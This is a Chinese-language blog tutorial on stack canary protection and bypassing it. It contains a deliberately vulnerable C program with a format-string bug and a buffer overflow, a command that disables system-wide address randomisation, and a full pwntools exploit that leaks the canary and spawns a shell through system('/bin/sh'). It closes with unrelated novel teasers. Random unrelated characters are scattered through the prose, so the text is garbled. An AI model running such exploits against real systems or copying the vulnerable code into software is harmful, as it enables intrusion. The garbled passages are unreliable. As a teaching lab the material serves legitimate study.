Canary機(jī)制及繞過策略-格式化字符串漏洞泄露Canary

Canary主要用于防護(hù)棧溢出攻擊缎岗。我們知道,在32位系統(tǒng)上白粉,對(duì)于棧溢出漏洞传泊,攻擊者通常是通過溢出棧緩沖區(qū),覆蓋棧上保存的函數(shù)返回地址來達(dá)到劫持程序執(zhí)行流的目的蜗元。
Stack canary保護(hù)機(jī)制在剛進(jìn)入函數(shù)時(shí)或渤,在棧上放置一個(gè)標(biāo)志canary,然后 在函數(shù)結(jié)束時(shí)奕扣,判斷該標(biāo)志是否被改變,如果被改變掌敬,則表示有攻擊行為發(fā)生惯豆。

gcc相關(guān)參數(shù)及意義

-fstack-protector:?jiǎn)⒂枚褩1Wo(hù),不過只為局部變量中含有 char 數(shù)組的函數(shù)插入保護(hù)代碼
-fstack-protector-all:?jiǎn)⒂枚褩1Wo(hù)奔害,為所有函數(shù)插入保護(hù)代碼楷兽。
-fno-stack-protector:禁用堆棧保護(hù)

一,實(shí)驗(yàn)源碼

文件名:Canary.c

#include <stdio.h>
#include <string.h>

void vul(char *msg_orig)
{
    char msg[128];
    memcpy(msg,msg_orig,128);
    printf(msg);

    char shellcode[64];
    puts("Now ,plz give me your shellcode:");
    read(0,shellcode,256);

}


int main()
{
    puts("So plz leave your message:");
    char msg[128];
    memset(msg,0,128);
    read(0,msg,128);
    vul(msg);
    puts("Bye!");
    return 0;

}

二华临,編譯

命令:gcc -m32 -ggdb -z execstack -fstack-protector -no-pie -o pwnme Cannary.c

使用ldd pwnme,查看libc文件的加載位置是否會(huì)變

如果會(huì)改變芯杀,為了調(diào)試方便,可以使用:echo 0 > /proc/sys/kernel/randomize_va_space,關(guān)閉整個(gè)系統(tǒng)的地址隨機(jī)化保護(hù)。

運(yùn)行測(cè)試下

ok!!!

三揭厚,調(diào)試

gdb調(diào)試:


vul函數(shù)返回前

我們簡(jiǎn)單了解了下canary機(jī)制却特,接下來嘗試?yán)酶袷交址┒葱孤禼anary的值

泄露Canary

其實(shí)canary的值在程序每一次運(yùn)行都是會(huì)改變的

我們?cè)?code>xor下一個(gè)斷點(diǎn),測(cè)試一下筛圆。

重新運(yùn)行

所以說canary的值具有不可預(yù)測(cè)性
但是裂明,eax的值來源于gs:0x14,而gs:0x14存在于棧空間上太援,所以我們只要找到它椕龌蓿空間上的位置,就可以泄露它的值提岔。接下來我們就利用格式化字符串漏洞泄露Canary

首先在格式化漏洞點(diǎn)printf函數(shù)下好斷點(diǎn)

運(yùn)行仙蛉,輸入:AAAAAAAAAA

然后查看棧空間內(nèi)容碱蒙,esp = 0xffffd0c0荠瘪,指向字符串起始位置 = 0xffffd12c

由此可知格式化字符串偏移為 = (0xffffd12c - 0xffffd0c0) / 4 = 27

然后我們?cè)跈z測(cè)處下斷點(diǎn),查看看Canary的值 = 0xd7203900

這時(shí)候我們看上一張圖振亮,然后你會(huì)有一個(gè)地方的值是相同的巧还,而這個(gè)位址就是canary

同理得到Canary的偏移 = 59,也就是說,在程序調(diào)用vulprintf時(shí)坊秸,輸入%59$x'打印出來的就是canary的值麸祷。

四,代碼

文件名:exp.py
其中涉及到ret2libc褒搔,可以先查看http://www.reibang.com/p/c90530c910b0阶牍,再看代碼。
因?yàn)橹皇情_啟Canary星瘾,所以解題方法挺多走孽,泄露處Canary就算經(jīng)典棧溢出也可以。

from pwn import *

p = process('./pwnme')

elf = ELF('/lib32/libc.so.6')                                     #加載的libc文件
libc_base = 0xf7dd1000                                            #libc基址
system_addr =  libc_base + elf.symbols['system']            #system函數(shù)地址
bin_sh_addr =  libc_base + next(elf.search('/bin/sh'))      #'/bin/sh'地址

buf = '%59$x'                                                  #構(gòu)建泄露Canary的格式化字符串
p.recvuntil("message:\n")
p.sendline(buf)                                                  #發(fā)送

ret_msg = p.recvuntil('\n')
canary = int(ret_msg,16)                                        #接收到返回的Cannary的值                

p.recvuntil('shellcode:')                                        #利用棧溢出漏洞
buf = 192 * 'A'                                                  #構(gòu)建buf
buf += p32(canary)                                          #在Canary地址覆蓋Canary原本的值琳状,不改變Canary的值從而繞過檢查
buf += 28 * 'B'
buf += p32(system_addr)
buf += p32(0xdeadbeef)
buf += p32(bin_sh_addr)

p.sendline(buf)                                                      #發(fā)送

p.interactive()

五磕瓷,測(cè)試

輸入whoami,返回當(dāng)前用戶為root,未報(bào)錯(cuò),得到可產(chǎn)生交互的shell念逞,實(shí)驗(yàn)完成困食!

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市翎承,隨后出現(xiàn)的幾起案子硕盹,更是在濱河造成了極大的恐慌,老刑警劉巖叨咖,帶你破解...
    沈念sama閱讀 206,723評(píng)論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件瘩例,死亡現(xiàn)場(chǎng)離奇詭異啊胶,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)垛贤,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,485評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門焰坪,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人南吮,你說我怎么就攤上這事琳彩。” “怎么了部凑?”我有些...
    開封第一講書人閱讀 152,998評(píng)論 0 344
  • 文/不壞的土叔 我叫張陵露乏,是天一觀的道長(zhǎng)。 經(jīng)常有香客問我涂邀,道長(zhǎng)瘟仿,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,323評(píng)論 1 279
  • 正文 為了忘掉前任比勉,我火速辦了婚禮劳较,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘浩聋。我一直安慰自己观蜗,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,355評(píng)論 5 374
  • 文/花漫 我一把揭開白布衣洁。 她就那樣靜靜地躺著墓捻,像睡著了一般。 火紅的嫁衣襯著肌膚如雪坊夫。 梳的紋絲不亂的頭發(fā)上砖第,一...
    開封第一講書人閱讀 49,079評(píng)論 1 285
  • 那天,我揣著相機(jī)與錄音环凿,去河邊找鬼梧兼。 笑死,一個(gè)胖子當(dāng)著我的面吹牛智听,可吹牛的內(nèi)容都是我干的羽杰。 我是一名探鬼主播,決...
    沈念sama閱讀 38,389評(píng)論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼到推,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼忽洛!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起环肘,我...
    開封第一講書人閱讀 37,019評(píng)論 0 259
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎集灌,沒想到半個(gè)月后悔雹,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體复哆,經(jīng)...
    沈念sama閱讀 43,519評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,971評(píng)論 2 325
  • 正文 我和宋清朗相戀三年腌零,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了梯找。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,100評(píng)論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡益涧,死狀恐怖锈锤,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情闲询,我是刑警寧澤久免,帶...
    沈念sama閱讀 33,738評(píng)論 4 324
  • 正文 年R本政府宣布,位于F島的核電站扭弧,受9級(jí)特大地震影響阎姥,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜鸽捻,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,293評(píng)論 3 307
  • 文/蒙蒙 一呼巴、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧御蒲,春花似錦衣赶、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,289評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至痰滋,卻和暖如春摘能,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背敲街。 一陣腳步聲響...
    開封第一講書人閱讀 31,517評(píng)論 1 262
  • 我被黑心中介騙來泰國(guó)打工团搞, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人多艇。 一個(gè)月前我還...
    沈念sama閱讀 45,547評(píng)論 2 354
  • 正文 我出身青樓逻恐,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親峻黍。 傳聞我的和親對(duì)象是個(gè)殘疾皇子复隆,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,834評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容